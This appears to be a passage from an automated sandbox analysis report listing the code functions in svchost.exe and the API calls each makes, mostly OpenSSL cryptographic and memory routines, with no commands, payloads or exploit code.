          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935CC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A935CC60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D2C60 CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A92D2C60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D8C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,28_2_00007FF8A92D8C60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,28_2_00007FF8A92F4CB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9344CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A9344CC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,28_2_00007FF8A92DECD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9338CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,28_2_00007FF8A9338CA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9306B30 CRYPTO_free,CRYPTO_free,28_2_00007FF8A9306B30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DCB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,28_2_00007FF8A92DCB70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932EB20 CRYPTO_free,28_2_00007FF8A932EB20
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9340B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,28_2_00007FF8A9340B20
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,28_2_00007FF8A933CB30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9350B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A9350B30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9306BB0 CRYPTO_malloc,28_2_00007FF8A9306BB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DAB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,28_2_00007FF8A92DAB80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FCB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92FCB80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,28_2_00007FF8A92EABF0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931AB80 CRYPTO_free,28_2_00007FF8A931AB80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9338B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,28_2_00007FF8A9338B90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9348B90 CRYPTO_free,CRYPTO_memdup,28_2_00007FF8A9348B90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9322BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,28_2_00007FF8A9322BA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932EED0 CRYPTO_malloc,CRYPTO_free,28_2_00007FF8A932EED0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D4E80 CRYPTO_free,28_2_00007FF8A92D4E80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F0EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A92F0EF0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FCED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A92FCED0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9304D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,28_2_00007FF8A9304D30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FCD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92FCD10
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,28_2_00007FF8A932ED00
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DEDB0 CRYPTO_THREAD_run_once,28_2_00007FF8A92DEDB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A932EDD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9350D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A9350D80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92ECDC0 CRYPTO_malloc,CRYPTO_clear_free,28_2_00007FF8A92ECDC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9322DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,28_2_00007FF8A9322DB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D1030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,28_2_00007FF8A92D1030
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9323040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,28_2_00007FF8A9323040
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A933B040
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DD010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92DD010
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F1000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A92F1000
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E5070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,28_2_00007FF8A92E5070
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E5050 CRYPTO_set_ex_data,28_2_00007FF8A92E5050
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F5040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A92F5040
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DB0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,28_2_00007FF8A92DB0B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93410E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A93410E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,28_2_00007FF8A932F0F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9351090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A9351090
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93050D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,28_2_00007FF8A93050D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9322F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,28_2_00007FF8A9322F60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9346F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A9346F60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9322F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,28_2_00007FF8A9322F00
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9358FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8A9358FD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933AFE0 CRYPTO_free,28_2_00007FF8A933AFE0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931CFF0 CRYPTO_realloc,28_2_00007FF8A931CFF0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9332FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8A9332FA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,28_2_00007FF8A933EFA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D6FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,28_2_00007FF8A92D6FC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EE220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,28_2_00007FF8A92EE220
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,28_2_00007FF8A92F4260
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E02B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,28_2_00007FF8A92E02B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,28_2_00007FF8A931A2C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93502C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,28_2_00007FF8A93502C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93582E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,28_2_00007FF8A93582E7
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,28_2_00007FF8A933A2E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93322F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A93322F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D62C0 CRYPTO_clear_free,28_2_00007FF8A92D62C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FC2C0 CRYPTO_free,28_2_00007FF8A92FC2C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E0130 CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A92E0130
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4120 CRYPTO_set_ex_data,28_2_00007FF8A92F4120
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9328160 CRYPTO_memdup,28_2_00007FF8A9328160
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,28_2_00007FF8A92F4160
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9318120 CRYPTO_free,28_2_00007FF8A9318120
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F8140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92F8140
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9320130 CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A9320130
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932A1D0 CRYPTO_realloc,28_2_00007FF8A932A1D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E6190 CRYPTO_malloc,CRYPTO_free,28_2_00007FF8A92E6190
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93121E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,28_2_00007FF8A93121E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E81E0 CRYPTO_get_ex_data,28_2_00007FF8A92E81E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,28_2_00007FF8A933C190
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9356190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,28_2_00007FF8A9356190
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93241B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,28_2_00007FF8A93241B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A935844C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9354460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,28_2_00007FF8A9354460
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9312470 CRYPTO_zalloc,28_2_00007FF8A9312470
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9308400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,28_2_00007FF8A9308400
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D2460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,28_2_00007FF8A92D2460
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9358414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,28_2_00007FF8A9358414
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F0450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,28_2_00007FF8A92F0450
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9358426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,28_2_00007FF8A9358426
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,28_2_00007FF8A92F4490
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E24D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,28_2_00007FF8A92E24D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EA330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92EA330
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9304330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,28_2_00007FF8A9304330
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9340340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,28_2_00007FF8A9340340
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,28_2_00007FF8A930A330
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,28_2_00007FF8A92F4380
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93123F0 CRYPTO_free,28_2_00007FF8A93123F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D23C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92D23C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EC610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A92EC610
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A931E660
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4660 CRYPTO_free,CRYPTO_malloc,memcpy,28_2_00007FF8A92F4660
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9322630 OPENSSL_cleanse,CRYPTO_free,28_2_00007FF8A9322630
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9342630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A9342630
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932E6D0 CRYPTO_malloc,28_2_00007FF8A932E6D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9352500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,28_2_00007FF8A9352500
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,28_2_00007FF8A930E510
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,28_2_00007FF8A931A5C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E25A0 CRYPTO_strdup,CRYPTO_free,28_2_00007FF8A92E25A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93045A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,28_2_00007FF8A93045A0
